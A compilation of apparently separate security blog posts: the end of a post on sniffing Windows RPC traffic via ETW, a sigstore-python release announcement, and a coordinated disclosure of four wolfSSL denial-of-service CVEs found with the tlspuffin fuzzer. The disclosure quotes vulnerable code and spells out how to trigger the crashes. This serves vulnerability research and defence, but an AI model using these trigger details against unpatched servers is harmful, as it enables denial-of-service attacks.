Sniffing RPC Traffic with ETW Data

Another useful feature of RPCI is that it provides visibility into RPC-related ETW data. ETW is a diagnostic capability built into the operating system. Many years ago ETW was very rudimentary, but since the Endpoint Detection and Response (EDR) market exploded in the last decade, Microsoft has evolved ETW into an extremely rich source of information about what’s going on in the system. The gist of how ETW works is that an ETW provider (typically a service or an operating system component) emits well-structured data in “event” packets and an application can consume those events to diagnose performance issues.

RPCI registers as a consumer of such events from the Microsoft-RPC (MSRPC) ETW provider and displays those events in real time in either table or graph format. To start the RPC Sniffer tool, navigate to Tools -> RPC Sniffer… and click the “play” button in the toolbar. Both the table and graph will be updated every few seconds as events begin to arrive.

The events emitted by the MSRPC provider are fairly simple. The events record the results of RPC calls between a client and server in RpcClientCall and RpcServerCall start and stop task pairs. The start events contain detailed information about the RPC server interface, such as the protocol, procedure number, options, and authentication used in the call. The stop events are typically less interesting but do include a status code. By correlating the call start/stop events between a particular RPC server and the requesting process, we can begin to make sense of the operations that are in progress on the system. In the table view, it’s easier to see these event pairs when the ETW data is grouped by ActivityId (click the “Group” button in the toolbar), as shown below.

The data can be overwhelming, because ETW is fairly noisy by design, but the graph view can help you wade through the noise. To use the graph view, simply click the “Node” button in the toolbar at any time during the trace. To switch back to the table view, click the “Node” button again.

A long-running trace will produce a busy graph like the one above. You can pan, zoom, and change the graph layout type to help drill into interesting server activity. We are exploring additional ways to improve this visualization!

In the zoomed-in screenshot above, we can see individual service processes that are interacting with system services such as Base Filtering Engine (BFE, the Windows Defender firewall service), NSI, and LSASS.

Here are some other helpful tips to keep in mind when using the RPC Sniffer tool:

  • Keep RPCI diagnostic tracing disabled in Settings.
  • Do not enable ETW debug events; these produce a lot of noise and can exhaust process memory after a few minutes.
  • For optimum performance, use a release build of RPCI.
  • Consider docking the main window adjacent to the sniffer window so that you can navigate between ETW data and library data (right-click on a table row and select Open in library or click on any RPC node while in the graph view).
  • Remember that the graph view will refresh every few seconds, which might cause you to lose your place if you are zooming and panning. The best use of the graph view is to take a capture for a fixed time window and explore the graph after the capture has been stopped.

What’s Next?

We plan to accomplish the following as we continue developing RPCI:

  • Improve the code editor in the Client Workbench
  • Improve the autogeneration of names so that they are more intuitive
  • Introduce more developer-friendly coding features
  • Improve the coverage of RPC/ALPC servers that are not registered with the endpoint mapper
  • Introduce an automated ALPC port connector/scanner
  • Improve the search experience
  • Extend the graph view to be more interactive

Related Research and Further Reading

Because MSRPC has been a popular research topic for well over a decade, there are too many related resources and research efforts to name here. We’ve listed a few below that we encountered while building this tool:

If you would like to see the source code for other related RPC tools, we’ve listed a few below:

If you’re unfamiliar with RPC internals or need a technical refresher, we recommend checking out one of the authoritative sources on the topic, Alex Ionescu’s 2014 SyScan talk in Singapore, “All about the RPC, LRPC, ALPC, and LPC in your PC.”

Announcing a stable release of sigstore-python

By William Woodruff

Read the official announcement on the Sigstore blog as well!

Trail of Bits is thrilled to announce the first stable release of sigstore-python, a client implementation of Sigstore that we’ve been developing for nearly a year! This work has been graciously funded by Google’s Open Source Security Team (GOSST), who we’ve also worked with to develop pip-audit and its associated GitHub Actions workflow.

If you aren’t already familiar with Sigstore, we’ve written an explainer, including an explanation of what Sigstore is, how you can use it on your own projects, and how tools like sigstore-python fit into the overall codesigning ecosystem.

If you want to get started, it’s a single pip install away:

$ echo 'hello sigstore' > hello.txt
$ python -m pip install sigstore
$ sigstore sign hello.txt
$ sigstore verify identity hello.txt \
    --cert-identity '' \
    --cert-oidc-issuer ''

A usable, reference-quality Sigstore client implementation

Our goals with sigstore-python are two-fold:

  • Usability: sigstore-python should provide an extremely intuitive CLI and API, with 100 percent documentation coverage and practical examples for both.
  • Reference-quality: sigstore-python is just one of many Sigstore clients being developed, including for ecosystems like Go, Ruby, Java, Rust, and JavaScript. We’re not the oldest implementation, but we’re aiming to be one of the most authoritative in terms of succinctly and correctly implementing the intricacies of Sigstore’s security model.

We believe we’ve achieved both of these goals with this release. The rest of this post will show off demonstrate how we did so!

Usability: sigstore-python is for everybody

The sigstore CLI

One of the Sigstore project’s mottos is “Software Signing for Everybody,” and we want to stay true to that with sigstore-python. To that end, we’ve designed a public Python API and sigstore CLI that abstract the murkier cryptographic bits away, leaving the two primitives that nearly every developer is already familiar with: signing and verifying.

To get started, we can install sigstore-python from PyPI, where it’s available as sigstore:

$ python -m pip install sigstore
$ sigstore --version
sigstore 1.0.0

From there, we can create an input to sign, and use sigstore sign to perform the actual signing operation:

$ echo "hello, i'm signing this!" > hello.txt
$ sigstore sign hello.txt

Waiting for browser interaction...
Using ephemeral certificate:

Transparency log entry created at index: 10892071
Signature written to hello.txt.sig
Certificate written to hello.txt.crt
Rekor bundle written to hello.txt.rekor

On your desktop this will produce an OAuth2 flow that prompts you for authentication, while on supported CI providers it’ll intelligently select an ambient OpenID Connect identity!

This will produce three outputs:

  • hello.txt.sig: the signature for hello.txt itself
  • hello.txt.crt: a certificate for the signature, containing the public key needed to verify the signature
  • hello.txt.rekor: an optional “offline Rekor bundle” that can be used during verification instead of accessing an online transparency log

Verification looks almost identical to signing, since the sigstore CLI intelligently locates the signature, certificate, and optional Rekor bundle based on the input’s filename. To actually perform the verification, we use the sigstore verify identity subcommand:

$ # finds hello.txt.sig, hello.txt.crt, hello.txt.rekor
$ sigstore verify identity hello.txt \
    --cert-identity \
OK: hello.txt

(What’s with the extra flags? Without them, we’d just be verifying the signature and certificate, and anybody can get a valid signature for any public input in Sigstore. To make sure that we’re actually verifying something meaningful, the sigstore CLI forces you to assert which identity the signature is expected to be bound to, which is then checked during certificate verification!)

However, that’s not all! Sigstore is not just for email identities; it also supports URI identities, which can correspond to a particular GitHub Actions workflow run, or some other machine identity. We can do more in-depth verifications of these signatures using the sigstore verify github subcommand, which allows us to check specific attestations made by the GitHub Actions runner environment:

$ # change this to any version!
$ v=0.10.0
$ repo=
$ release="${repo}/release/download"
$ sha=66581529803929c3ccc45334632ccd90f06e0de4

$ # download a distribution + certificate and signature
$ wget ${release}/v${v}/sigstore-${v}.tar.gz{,.crt,.sig}

$ # verify extended claims
$ sigstore verify github sigstore-${v}.tar.gz \
    --cert-identity \
      "${repo}/.github/workflows/release.yml@refs/tags/v${v}" \
    --sha ${sha} \
    --trigger release

This goes well beyond what we can prove with just a bare sigstore verify identity command: we’re now asserting that the signature was created by a release-triggered workflow run against commit 66581529803929c3ccc45334632ccd90f06e0de4, meaning that even if an attacker somehow managed to compromise our repository’s actions and sign for new inputs, they still couldn’t fool us into accepting the wrong signature for this release!

(--sha and --trigger are just a small sample of the claims that can be verified via sigstore verify github: check the README for even more!)

The brand-new sigstore Python APIs

In addition to the CLIs above, we’ve stabilized a public Python API! You can use this API to do everything that the sigstore CLI is capable of, as well as more advanced verification techniques (such as complex logical chains of “policies”).

Using the same signing example above, but with the Python APIs instead:

import io

from sigstore.sign import Signer
from sigstore.oidc import Issuer

contents = io.BytesIO(b"hello, i'm signing this!")

# NOTE: identity_token() performs an interactive OAuth2 flow;
# see other members of `sigstore.oidc` for other credential
# mechanisms.
issuer = Issuer.production()
token = issuer.identity_token()

signer = Signer.production()
result = signer.sign(input_=contents, identity_token=token)

And the same identity-based verification:

import base64
from pathlib import Path

from sigstore.verify import Verifier, VerificationMaterials
from sigstore.verify.policy import Identity

artifact = Path("hello.txt").open()
cert = Path("hello.txt.crt").read()
signature = Path("hello.txt.sig").read_bytes()
materials = VerificationMaterials(

verifier = Verifier.production()

result = verifier.verify(

The Identity policy corresponds to the sigstore verify identity subcommand, and hints at the Python API’s ability to express more complex relationships between claims. For example, here is how we could write the sigstore verify github verification from above:

from sigstore.verify import Verifier
from sigstore.verify.policy import (

materials = ...

verifier = Verifier.production()

result = verifier.verify(
            Identity(identity="...", issuer="..."),

…representing a logical AND between all sub-policies.

What’s next?

We’re making a commitment to semantic versioning for sigstore-python’s API and CLI: if you depend on sigstore~=1.0 in your Python project, you can safely assume that we will not make changes that break either without a major version bump.

With that in mind, a stable API enables many of our near-future goals for Sigstore in the Python packaging ecosystem: further integration into PyPI and the client-side packaging toolchain, as well as stabilization of our associated GitHub Action.

Work with us!

Trail of Bits is committed to the long term stability and expansion of the Sigstore ecosystem. If you’re looking to get involved in Sigstore or are working with your company to integrate it into your own systems, get in touch!

Keeping the wolves out of wolfSSL

By Max Ammann

Trail of Bits is publicly disclosing four vulnerabilities that affect wolfSSL: CVE-2022-38152, CVE-2022-38153, CVE-2022-39173, and CVE-2022-42905. The four issues, which have CVSS scores ranging from medium to critical, can all result in a denial of service (DoS). These vulnerabilities have been discovered automatically using the novel protocol fuzzer tlspuffin. This blog post will explore these vulnerabilities, then provide an in-depth overview of the fuzzer.

tlspuffin is a fuzzer inspired by formal protocol verification. Initially developed as part of my internship at LORIA, INRIA, France, it is especially targeted against cryptographic protocols like TLS or SSH.

During my internship at Trail of Bits, we pushed protocol fuzzing even further by supporting a new protocol (SSH), adding more fuzzing targets, and (re)discovering vulnerabilities. This work represents a milestone in the development of the first Dolev-Yao model-guided fuzzer. By supporting an additional protocol, we proved that our fuzzing approach is agnostic with respect to the protocol. Going forward, we aim to support other protocols such as QUIC, OpenVPN, and WireGuard.

Targeting wolfSSL

During my internship at Trail of Bits, we added several versions of wolfSSL as fuzzing targets. The wolfSSL library was an ideal choice because it was affected by two authentication vulnerabilities that were discovered in early 2022 (CVE-2022-25640 and CVE-2022-25638). That meant we could verify that tlspuffin works by using it to rediscover the known vulnerabilities.

As tlspuffin is written in Rust, we first had to write bindings to wolfSSL. While the bindings were being implemented, several bugs were discovered in the OpenSSL compatibility layer that have also been reported to the wolfSSL team. With the bindings ready, we were ready to let the fuzzer do its job: discovering weird states within wolfSSL.

Discovered Vulnerabilities

During my internship, I discovered several vulnerabilities in wolfSSL, which can result in a denial of service (DoS).

  • DOSC: CVE-2022-38153 allows MitM actors or malicious servers to perform a DoS attack against TLS 1.2 clients by intercepting and modifying a TLS packet. This vulnerability affects wolfSSL 5.3.0.
  • DOSS: CVE-2022-38152 is a DoS vulnerability against wolfSSL servers that use the wolfSSL_clear function instead of the sequence wolfSSL_free; wolfSSL_new. Resuming a session causes the server to crash with a NULL-pointer dereference. This vulnerability affects wolfSSL 5.3.0 to 5.4.0.
  • BUF: CVE-2022-39173 is caused by a buffer overflow and causes a DoS of wolfSSL servers. It is caused by pretending to resume a session, and sending duplicate cipher suites in the Client Hello. It might allow an attacker to gain RCE on certain architectures or targets; however, this has not yet been confirmed. Versions of wolfSSL before 5.5.1 are affected.
  • HEAP: CVE-2022-42905 is caused by a buffer overread while parsing TLS record headers. Versions of wolfSSL before 5.5.2 are affected.

“A few CVEs for wolfSSL, one giant leap for tlspuffin.”

The vulnerabilities mark a milestone for the fuzzer: They are the first vulnerabilities found using this tool that have a far-reaching impact. We can also confidently say that this vulnerability would not have been easy to find with classical bit-level fuzzers. It’s especially intriguing that on average, the fuzzer took less than one hour to discover a vulnerability and crash.

While preparing the fuzzing setup for wolfSSL, we also discovered a severe memory leak that was caused by misuse of the wolfSSL API. This issue was reported to the wolfSSL team, changed their documentation to help users avoid the leak. Additionally, several other code-quality issues have been reported to wolfSSL, and their team fixed all of our findings within one week of disclosure. If a “best coordinated disclosure” award existed, the wolfSSL team would definitely win it.

The following sections will focus on two of the vulnerabilities because of their higher impact and expressive attack traces.

DOSC: Denial of service against clients

In wolfSSL 5.3.0, MiTM attackers or malicious servers can crash TLS clients. The bug lives in the AddSessionToCache function, which is called when the client receives a new session ticket from the server.

Let’s assume that each bucket of the session cache of wolfSSL contains at least one entry. As soon as a new session ticket arrives, the client will reuse a previously stored cache entry to try to cache it in the session cache. Additionally, because the new session ticket is quite large at 700 bytes, it will be allocated on the heap using XMALLOC.

In the following example, SESSION_TICKET_LEN is 256:

if (ticLen > SESSION_TICKET_LEN) {
    ticBuff = (byte*)XMALLOC(ticLen, NULL,


This allocation leads to the initialization of cacheTicBuff, as ticBuff is already initialized, cacheSession->ticketLenAlloc is 0, and ticLen is 700:

if (ticBuff != NULL && cacheSession->ticketLenAlloc < ticLen) { 
    cacheTicBuff = cacheSession->ticket;


The cacheTicBuff is set to the ticket of a previous session, cacheSession->ticket. The memory to which cacheTicBuff points is not allocated on the heap; in fact, cacheTicBuff points to cacheSession->_staticTicket. This is problematic because the cacheTicBuff is later freed if it is not null.

if (cacheTicBuff != NULL)


The process terminates by executing the XFREE function, as the passed pointer is not allocated on the heap.

Note that the ticket length in itself is not the cause of the crash. This vulnerability is quite different to Heartbleed, the buffer over-read vulnerability discovered in OpenSSL. With wolfSSL, a crash is caused not by overflowing buffers but by a logical bug.

Finding weird states

The fuzzer discovered the vulnerability in about one hour. The fuzzer modified the NewSessionTicket (new_message_ticket) message by replacing an actual ticket with a large array of 700 bytes (large_bytes_vec). This mutation of an otherwise-sane trace leads to a call of XFREE on a non-allocated value. This eventually leads to a crash of the client that receives such a large ticket.

Visualized exploit for DOSC (CVE-2022-38153). Each box represents a TLS message. Each message is composed of different fields like a protocol version or a vector of cipher suites. The visualization was generated using the tlspuffin fuzzer and mirrors the structure of the DY attacker traces which will be introduced in the next section.

A single execution of the above trace is not enough to reach the vulnerable code. As the bug resides in the session cache of wolfSSL, we need to let the client cache fill up in order to trigger the crash. Empirically, we discovered that about 30 prior connections are needed to reliably crash them. The reason for the random behavior is that the cache consists of multiple rows or buckets; the default compilation configuration of wolfSSL contains 11 buckets. Based on the hash of the TLS session ID, sessions are stored in one of these buckets. The DoS is triggered only if the current bucket already contains a previous session.

Reproducing this vulnerability is difficult, as a prepared state is required to reach the behavior. In general, a global state such as the wolfSSL cache makes fuzzing more difficult to apply. Ideally, one might assume that each execution of a program yields the same outputs given the identical inputs. Reproduction and debugging become more challenging if this assumption is violated because the program uses a global state; this represents a general challenge when fuzzing unknown targets.

Fortunately, tlspuffin allows researchers to recreate a program state that is similar to the one that was present when the fuzzer observed a crash. We were able to re-execute all the traces that the fuzzer rated as interesting, which allowed us to observe the crash of wolfSSL in a more controlled environment and to debug wolfSSL using GDB. After analyzing the call stack that led to the invalid free, it was clear that the bug was related to the session cache.

The root cause for DOSC lies in the usage of a shared global state. It was very surprising to find that wolfSSL shares the state between multiple invocations of the library. Conceptually, the lifetime of the session cache should be bound to the TLS context, which already serves as a container for TLS session. Each SSL session shares the state with the TLS context. The addition of maintaining a global mutable state increases complexity throughout a codebase. Therefore, it should be used only when absolutely necessary.

BUF: Buffer overflow on servers

In versions of wolfSSL before 5.5.1, malicious clients can cause a buffer overflow during a resumed TLS 1.3 handshake. If an attacker resumes or pretends to resume a previous TLS session by sending a maliciously crafted Client Hello followed by another maliciously crafted Client Hello, then a buffer overflow is possible. A minimum of two Client Hellos must be sent: one that pretends to resume a previous session, and a second as a response to a Hello Retry Request message.

The malicious Client Hellos contain a list of supported cipher suites, which contain at least ⌊sqrt(150)⌋ + 1 = 13 duplicates and fewer than 150 ciphers in total. The buffer overflow occurs in the second invocation RefineSuites function during a handshake.

/* Refine list of supported cipher suites to those common to server and 
* ssl         SSL/TLS object.
* peerSuites  The peer's advertised list of supported cipher suites.
static void RefineSuites(WOLFSSL* ssl, Suites* peerSuites)
    byte   suites[WOLFSSL_MAX_SUITE_SZ];
    word16 suiteSz = 0;
    word16 i, j;


  for (i = 0; i < ssl->suites->suiteSz; i += 2) {
      for (j = 0; j < peerSuites->suiteSz; j += 2) {
          if (ssl->suites->suites[i+0] == peerSuites->suites[j+0] &&
              ssl->suites->suites[i+1] == peerSuites->suites[j+1]) {
              suites[suiteSz++] = peerSuites->suites[j+0];
              suites[suiteSz++] = peerSuites->suites[j+1];

  ssl->suites->suiteSz = suiteSz;
  XMEMCPY(ssl->suites->suites, &suites, sizeof(suites));


The RefineSuites function expects a struct WOLFSSL that contains a list of acceptable ciphers suites at ssl->suites, as well as an array of peer cipher suites. Both inputs are bounded by WOLFSSL_MAX_SUITE_SZ, which is equal to 150 cipher suites or 300 bytes.

Let us assume that ssl->suites consists of a single cipher suite like TLS_AES_256_GCM_SHA384 and that the user-controllable peerSuites list contains the same cipher repeated 13 times. The RefineSuites function will iterate for each suite in ssl->suites over peerSuites and append the suite to the suites array if it is a match. The suites array has a maximum length of WOLFSSL_MAX_SUITE_SZ suites.

With the just-mentioned input, the length of suites equals now 13. The suites array is now copied to the struct WOLFSSL in the last line of the listing above. Therefore, the ssl->suites array now contains 13 TLS_AES_256_GCM_SHA384 cipher suites.

During a presumably resumed TLS handshake, the RefineSuites function is called again if a Hello Retry Request is triggered by the client. The struct WOLFSSL is not reset in between and keeps the previous suites of 13 cipher suites. Because the TLS peer controls the peerSuites array, we assume that it again contains 13 duplicate cipher suites.

The RefineSuites function will iterate for each element in ssl->suites over peerSuites and append the suite to suites if it is a match. Because the ssl->suites
array contains already 13 TLS_AES_256_GCM_SHA384 cipher suites, in total 13 x 13 = 169 cipher suites are written to suites. The 169 cipher suites exceed the allocated maximum allowed WOLFSSL_MAX_SUITE_SZ cipher suites. The suites buffer overflows on the stack.

So far, we have been unable to exploit this bug and, for example, gain remote code execution because the set of bytes that can overflow the suites buffer is small. Only valid cipher suite values can overflow the buffer.

Because of space constraints, we are not providing a detailed review of the mutations that are required in order to mutate a sane trace to an attack trace, as we did with DOSC.

To understand how we found these vulnerabilities, it is worth examining how tlspuffin was developed.

Next Generation Protocol Fuzzing

History has proven that the implementation of cryptographic protocols is prone to errors. It’s easy to introduce logical flaws when translating specifications like RFC or scientific articles to actual program code. In 2017, researchers discovered that the well-known WPA2 protocol suffered severe flaws (KRACK). Vulnerabilities like FREAK, or authentication vulnerabilities like the wolfSSL bugs found in early 2022 (CVE-2022-25640 and CVE-2022-25638), support this idea.

It is challenging to fuzz implementations of cryptographic protocols. Unlike traditional fuzzing of file formats, cryptographic protocols require a specific flow of cryptographic and mutually dependent messages to reach deep protocol states.

Additionally, detecting logical bugs is a challenge on its own. The AddressSanitizer enables security researchers to reliably find memory-related issues. For logical bugs like authentication bypasses or loss of confidentiality no automated detectors exist.

These challenges are why I and Inria set out to design tlspuffin. The fuzzer is guided by the so-called Dolev-Yao model, which has been used in formal protocol verification since the 1980s.

The Dolev-Yao Model

Formal methods have become an essential tool in the security analysis of cryptographic protocols. Modern tools like ProVerif or Tamarin feature a fully automated framework to model and verify security protocols. The ProVerif manual and DEEPSEC paper provide a good introduction to protocol verification. The underlying theory of these tools uses a symbolic model—the Dolev-Yao model—that originates from the work of Dolev and Yao.

With Dolev-Yao models, attackers have full control over the messages being sent within the communication network. Messages are modeled symbolically using a term algebra, which consists of a set of function symbols and variables. This means that messages can be represented by applying functions over variables and other functions.

An adversary can eavesdrop on, inject, or manipulate messages; the Dolev-Yao model is meant to simulate real-world attacks on these protocols, such as Man-in-the-Middle (MitM)-style attacks. The cryptographic primitives are modeled through abstracted semantics because the Dolev-Yao model focuses on finding logical protocol flaws and is not concerned with correctness of cryptographic primitives. Because the primitives are described through an abstract semantic, there is no real implementation of, for example, RSA or AES defined in the Dolev-Yao model.

It was already possible to find attacks in the cryptographic protocols using this model. The TLS specification has already undergone various analyses by these tools in 2006 and 2017, which led to fixes in RFC drafts. But in order to fuzz implementations of protocols, instead of verifying their specification, we need to do things slightly differently. We chose to replace the abstract semantics with a more concrete one which includes implementations of primitives.

The tlspuffin fuzzer was designed based on the Dolev-Yao model and guided by the symbolic formal model, which means that it can execute any protocol flow that is representable in the Dolev-Yao model. It can also generate previously unseen protocol executions. The following section explains the notion of Dolev-Yao traces, which are loosely based on the Dolev-Yao model.

Dolev-Yao Traces

Dolev-Yao traces build on top of the Dolev-Yao model and also use a term algebra to represent messages symbolically. Just like in the Dolev-Yao model, the cryptographic primitives are treated as black boxes. This allows the fuzzer to focus on logical bugs, instead of testing cryptographic primitives for their correctness.

Let’s start with an example of the infamous Needham-Schröder protocol. If you aren’t familiar, Needham-Schröder is an authentication protocol that allows two parties to establish a shared secret through a trusted server; however, its asymmetric version is infamous for being susceptible to an MitM attack.

The protocol allows Alice and Bob to create a shared secret through a trusted third-party server. The protocol works by requesting a shared secret from the server that is encrypted once for Bob and once for Alice. Alice can request a fresh secret from the server and will receive an encrypted message that contains the shared secret and a further encrypted message addressed to Bob. Alice will forward the message to Bob. Bob can now decrypt the message and also has access to the shared secret.

The flaw in the protocol allows an imposter to impersonate Alice by first initiating a connection with Alice and then forwarding the received data to Bob. (For a deeper understanding of the protocol, we suggest reading its Wikipedia article.)

In the below Dolev-Yao trace T, we model one specific execution of the Needham-Schröder protocol between the two agents with the names a and b. Each agent has an underlying implementation. The trace consists of a concatenation of steps that are delimited by a dot. There are two kinds of steps: input and output. Output steps are denoted by a bar above the agent name.

Dolev-Yao attack trace for the Needham-Schröder protocol

Let’s now describe the semantics of trace T. (A deep understanding of the steps of this protocol is not needed. This example should just give you a feeling about the expressiveness of the Dolev-Yao model and what a Dolev-Yao trace is.)

In the first step, we send the term pk(sk_E) to agent a. Agent a will serialize the term and provide it to its underlying implementation of Needham-Schröder.

Next, we let the agent a output a bitstring and bind it to h_1. By following the steps in the Dolev-Yao trace, we can observe that we now send the term aenc(adec(h_1, sk_E), pk(sk_B)) to agent b.

Next, we let agent b’s underlying implementation output a bitstring and bind it to h_2. The next two steps forward the message h_2 to agent a and bind its new output to h_3. Finally, we repeat the third and fourth step for a different input, namely h_3, and send the term h_3 to agent a.

Such traces allow us to model arbitrary execution flows of cryptographic protocols. The trace above models an MitM attack, originally discovered by Gavin Lowe. A fixed version of the protocol is known as the Needham-Schroeder-Lowe protocol.

TLS 1.3 Handshake Protocol

Before providing an example for a modern cryptographic protocol, I quickly want to explain the different phases of a TLS handshake.

Overview of the phases of a TLS handshake

  1. Key exchange: Establish shared keys and select the cryptographic methods and parameters. Both messages in this phase are not encrypted.
  2. Server parameters: Exchange further parameters that are no longer sent in plaintext.
  3. Server authentication: Authenticate the server by confirming keys and handshake integrity.
  4. Client authentication: Optionally, authenticate the client by confirming keys and handshake integrity.

Just like in the Needham-Schröder example, each message of the TLS handshake can be represented by a symbolic term. For example, the first Client Hello message can be represented as the term fn_client_hello(fn_key_share, fn_signature_algorithm, psk). In this example, fn_key_share, fn_signature_algorithm, and psk are constants.

For a more in-depth review of the handshake message, Section 2 of RFC 8446 explains each message in more detail.

Fuzzing Dolev-Yao Traces

The tlspuffin fuzzer implements Dolev-Yao traces and allows their execution in concrete fuzzing targets like OpenSSL, wolfSSL, and libssh.

Structure of tlspuffin. It follows the best-practices defined by LibAFL.

The design of tlspuffin is based on the evolutionary fuzzer LibAFL. The fuzzer uses several concepts, which are illustrated in the following sections. We will follow traces on their journey from being picked from a seed corpus until they are mutated, executed, observed, and eventually become an attack trace.

Seed Corpus

Initially, the seed corpus contains some handcrafted traces that represent some common attack scenarios (e.g., client/server is the attacker or the MitM is the attacker).

Scheduler and Mutational Stage

The scheduler picks seeds based on a heuristic; for example, the scheduler might prefer shorter and more minimal traces. After that, the picked traces are mutated. This means that messages are skipped or repeated or their contents are changed. Because we are using a Dolev-Yao model to represent messages, we can change fields of messages by swapping sub terms or changing function symbols.

Executor, Feedback, and Objectives

After the traces have been mutated, they are sent to the executor. The executor is responsible for executing the traces in actual implementations such as OpenSSL or wolfSSL, where they are executed in either the same process or a fork for each input. The executor is also responsible for collecting observations about the execution. An observation is classified as feedback if it contains information about newly discovered code edges in terms of coverage. For example, if the trace made the fuzzing target crash or an authentication bypass was witnessed, the trace is classified as an objective. The observation is then either added to the seed corpus or the objective corpus based on how it was classified.

Finally, we can repeat the process and start picking new traces from the seed corpus. This algorithm is quite common in fuzzing and is closely related to the approach of the classical AFL fuzzer. (For a more in-depth explanation of this particular algorithm, refer to the preprint LibAFL: A Framework to Build Modular and Reusable Fuzzers.)

Internship Highlights

During my internship, we added several new features to tlspuffin that extended the tool in several dimensions, which are:

  • Protocol implementations,
  • Cryptographic protocols,
  • Detection of security violations, and
  • Reproducibility of vulnerabilities.

Toward more Fuzzing Targets

Before my internship at Trail of Bits, tlspuffin already supported fuzzing several versions of OpenSSL (including the version 1.0.1, which is vulnerable to Heartbleed) and LibreSSL. We designed an interface that added the capability to fuzz arbitrary protocol libraries. By implementing the interface for wolfSSL, we were able to add support for fuzzing wolfSSL 4.3.0 to 5.4.0, even though wolfSSL is not ABI compatible with OpenSSL or LibreSSL. Because the interface is written in Rust, implementing it for wolfSSL required us to create Rust bindings. The great thing about this is that the wolfSSL bindings could be reused outside of tlspuffin for embedded software projects. We released open-source wolfSSL bindings on GitHub.

This represents a milestone in library support. Previously, the tlspuffin was bound to the OpenSSL API, which is supported only by LibreSSL and OpenSSL. With this interface, it will be possible to support arbitrary future fuzzing targets.

Toward more Protocols

Although tlspuffin was specifically designed for the TLS protocol, it has the capability to support other formats. In fact, any protocol that is formalized in the Dolev-Yao model should also be fuzzable with tlspuffin. We added support for SSH, which required us to abstract over certain protocol primitives such as messages, message parsing, the term algebra, and knowledge queries. The same abstraction we choose for TLS also, for the most part, works for SSH. However, the SSH protocol required a few adjustments because of a stateful serialization of protocol packets.

In order to test the SSH abstractions, we added support for fuzzing libssh (not to be confused with libssh2). As with wolfSSL, one of our first tasks was to create Rust bindings, which we plan to release separately as open-source software in the future.

Toward a better Security Violation Oracle

Detecting security violations other than segmentation faults, buffer overflows, or use-after-free is essential for protocol fuzzers. In the world of fuzzers, an oracle decides whether a specific execution of the program under test reached some objective.

When using sanitizers like AddressSanitizer, buffer overflows or over-reads can make the program crash. In traditional fuzzing, the oracle decides whether the classical objective “program crashed” is fulfilled. This allows oracles to detect not only program crashes caused by segmentation faults, but also memory-related issues.

Many security issues like authentication bypasses or protocol downgrades in TLS libraries do not make themselves obvious by crashing. To address this, tlspuffin features a more sophisticated oracle that can detect protocol-specific problems. This allowed tlspuffin to rediscover not just vulnerabilities like Heartbleed or CVE-2021-3449, but also logical vulnerabilities like FREAK. During my internship, we extended the capabilities of the security violation oracle to include authentication checks, which led us to rediscover two authentication bugs in wolfSSL (CVE-2022-25640 and CVE-2022-25638). This indicates that tlspuffin automatically discovered these vulnerabilities without human interaction.

Toward better Reproducibility

If the fuzzer discovers an alleged attack trace, then we as security researchers have to validate the finding. A good way to verify results is to execute them against an actual target like a TLS server or client over TCP. By using default settings, we can ensure that the setup of the fuzzing target is not causing false positives.

During the internship, we worked on a feature that allows users to execute a Dolev-Yao trace against clients or servers over TCP, which allows us to test attack traces against targets in isolation. One of these targets could be an OpenSSL server that is reachable over TCP. Every OpenSSL installation comes with such a server, which can be started using openssl s_server -key key.pem -cert cert.pem. A similar test server exists for wolfSSL. We can now execute traces through tlspuffin and see if the server crashes, misbehaves, or simply errors.

As described above, this enabled us to verify CVE-2022-38153 and to determine that a crash happens only when using a specific setup of the wolfSSL library.


Considerations for implementation

Despite this work, Dolev-Yao model-guided fuzzing also has drawbacks. Significant effort is required to integrate new fuzzing targets or protocols. Adding support for SSH took roughly five to six weeks, and adding a new fuzzing target took between one and two weeks. Finally, the fuzzer needed to be tested, bugs in the test harness needed to be resolved, and the fuzzer needed to be run for a reasonable length of time; in our case, finding bugs took another week. Note that letting a single instance of the fuzzer run for a long time might not be the best approach. Restarting the fuzzer every few days is a good approach to avoid that the fuzzer gets stuck in a “local minima” with respect to coverage.

Therefore, the overall process of applying Dolev-Yao model-guided fuzzing to an arbitrary cryptographic protocol and arbitrary implementation takes a few months. Based on these estimates, the fuzzing technique is best suited for ubiquitous protocols with multiple implementations like TLS or SSH, where the benefits outweigh the effort.

We noticed that protocol-specific features can increase the complexity of integration. For example, TLS uses transcripts, which can significantly increase the size of protocol messages. We applied a workaround for large transcripts in tlspuffin. In the case of SSH, we observed that message encoding and decoding is stateful, which means that messages are encoded differently based on the protocol state (a different MAC algorithm is used based on negotiated parameters).

On the contrary, testing existing or future TLS or SSH implementations through Dolev-Yao model-guided fuzzing is very promising. Investing a couple of weeks seems reasonable given that once a library is integrated into tlspuffin, it can be fuzzed continuously over many versions.

Usage in test-suites

Developers can also use tlspuffin for writing test suites. It is possible to run traces against libraries, which test for the absence of specific authentication bugs. This allows for the implementation of regression tests to ensure that previous bugs do not occur again. In other words, tlspuffin can be used for the same tasks for which TLS-Attacker is currently used.


To summarize, Dolev-Yao model-guided fuzzing is a novel and promising technique to fuzz test cryptographic protocols. It has proved its feasibility by rediscovering already-known authentication vulnerabilities and finding new DoS attacks in wolfSSL.

tlspuffin is a good fit for high-impact and widely used protocols like TLS or SSH. Integrating a new protocol into tlspuffin takes significant effort and requires an in-depth understanding of the protocol. In traditional fuzzing, domain-specific knowledge is sometimes relatively unimportant because simple fuzzers in a standard configuration can yield strong results. This advantage is lost if tlspuffin is used for protocols that are not yet supported.

Despite this, tlspuffin shines when it is used on an already-supported protocol. The internet heavily depends on the TLS and SSH protocols, and security issues affecting them have far-reaching implications. If TLS or SSH breaks, then the internet breaks. Luckily, this has not happened yet due to the great work of security researchers around the world. Let’s keep it that way by verifying, testing, and fuzzing cryptographic protocols!

I would like to wholeheartedly thank my mentor, Opal Wright. She supported me throughout my internship and motivated me by giving me plenty of praise for my work. I’d also like to give a great thanks to the entire cryptography team, who provided me with valuable feedback. Last but not least, I would like to thank my friends at INRIA for hosting me last year for my master thesis, which led to the development of tlspuffin. Without their mentorship and fundamental research, this work would not have been possible.

Coordinated disclosure timeline

As part of the disclosure process, we reported four vulnerabilities in total to WolfSSL. The timeline of disclosure and remediation is provided below:

  • August 12, 2022: Contacted wolfSSL support to set up a secure channel.
  • August 12, 2022: Reported CVE-2022-38152 and CVE-2022-38153 to wolfSSL.

For CVE-2022-38152:

  • August 12, 2022: wolfSSL maintainers confirmed and fixed the vulnerability.

For CVE-2022-38153:

  • August 16, 2022: wolfSSL maintainers confirmed the vulnerability.
  • August 17, 2022: wolfSSL maintainers fixed the vulnerability.
  • August 30, 2022: wolfSSL released a fixed version, 5.5.0.
